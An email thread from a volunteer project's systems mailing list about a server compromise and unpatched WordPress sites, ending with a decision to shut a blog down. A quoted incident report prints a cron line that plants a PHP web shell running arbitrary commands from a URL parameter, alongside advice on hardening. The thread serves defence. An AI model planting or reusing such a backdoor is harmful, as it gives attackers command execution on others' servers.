<div dir="ltr">Let's shut it down for the time being. I've been updating the wiki but not my blog since the attack last year anyway.<div> </div><div>-walter</div></div><div class="gmail_extra"> <div class="gmail_quote">On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <<a href="mailto:bernie@codewiz.org" target="_blank">bernie@codewiz.org</a>> wrote: <blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">+walter Can we appoint an official maintainer for <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a>? Sorry for not stepping up myself, but I'm overwhelmed by work related things and trying to reduce my sysadmin load. On 03/01/2016 02:50 PM, Samuel Cantero wrote: > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <<a href="mailto:bernie@codewiz.org">bernie@codewiz.org</a> > <mailto:<a href="mailto:bernie@codewiz.org">bernie@codewiz.org</a>>> wrote: > > On 02/25/2016 04:09 AM, Sebastian Silva wrote: > > Remember in June we had an incident with a broken Wordpress site. > > I switched to static generator since then. > > > > +1 on containers just learning more about them and finding them fascinating. > > Count me in on containerizing everything. > > > > I'm not aware of other wordpress sites. Maybe walter's blog? > > Wordpress is a PIA IMHO. > > Yes, WP is riddled with security holes. Back in October, Samuel helped > Walter upgrade <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> on > sunjammer. Samuel, can you confirm > that the WP instance now fully patched and locked down? > > > The WP version on <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> site is > 4.3.1. The WP last version is 4.4.2. I have checked the WP change log > and we can find this: > > 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site > scripting vulnerability that could allow a site to be compromised. > > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two > security issues: a possible SSRF for certain local URIs, and an open > redirection attack. > > This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7. > Significant information on the release notes: > > * Pre-emptive security improvements to ensure that the Akismet plugin > can't be used by attackers to compromise a WordPress installation. > * Closes a potential XSS vulnerability. > > Of course, every version has a lot of bug fixes. We definitely should > upgrade it and test nothing breaks <a href="http://walterbender.org" rel="noreferrer" target="_blank">walterbender.org</a> > <<a href="http://walterbender.org" rel="noreferrer" target="_blank">http://walterbender.org</a>> site. > > Who is in charge of upgrading the others WP sites? > > Regards, > > Samuel C. > > > > > > Regards, > > Sebastian > > > > > > On 25/02/16 04:47, Bernie Innocenti wrote: > >> While I was looking for cronjobs in /var/spool/cron/crontabs/, i > found > >> that www-data was executing commands like these: > >> > >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == > >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); > >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php > >> > >> Did you spot the system()? This executes arbitrary commands specified > >> via the "localtime" url parameter. Uh-oh. > >> > >> There were about a dozen lines like the above, installing > .cache.php in > >> various virtualhosts. I kept a copy of the file in > >> /root/www-data.backdoor. The file was last written on Jun 23 2015, > >> which may correlate with the switch to the new website. > >> > >> I cleared the mess and searched the logs for requests containing > >> "localtime", but couldn't find any. I wonder if they could filter the > >> logs, since they were previously writable by www-data. > >> > >> Please watch out. We should ensure directories accessible over > http are > >> not writable by user www-data, especially those in which PHP and CGIs > >> are enabled. > >> > >> Running several large sites under the same uid has always been a bad > >> security practice, and looking forward we should keep migrating > them to > >> properly isolated containers. > >> > >> Finally, Wordpress is particularly dangerous and we should update and > >> harden all instances. Can someone please take care of this? I'll do > >> Mediawiki, which I know pretty well. > >> > > > > > -- > _ // Bernie Innocenti > \X/ <a href="http://codewiz.org" rel="noreferrer" target="_blank">http://codewiz.org</a> > _______________________________________________ > Systems mailing list > <a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a> <mailto:<a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a>> > <a href="http://lists.sugarlabs.org/listinfo/systems" rel="noreferrer" target="_blank">http://lists.sugarlabs.org/listinfo/systems</a> > > > > > _______________________________________________ > Systems mailing list > <a href="mailto:Systems@lists.sugarlabs.org">Systems@lists.sugarlabs.org</a> > <a href="http://lists.sugarlabs.org/listinfo/systems" rel="noreferrer" target="_blank">http://lists.sugarlabs.org/listinfo/systems</a> > -- _ // Bernie Innocenti \X/ <a href="http://codewiz.org" rel="noreferrer" target="_blank">http://codewiz.org</a> </blockquote></div> <div> </div>-- <div class="gmail_signature"><div dir="ltr"><div>Walter Bender Sugar Labs</div><div><a href="http://www.sugarlabs.org" target="_blank">http://www.sugarlabs.org</a> <a href="http://www.sugarlabs.org" target="_blank"></a> </div></div></div> </div>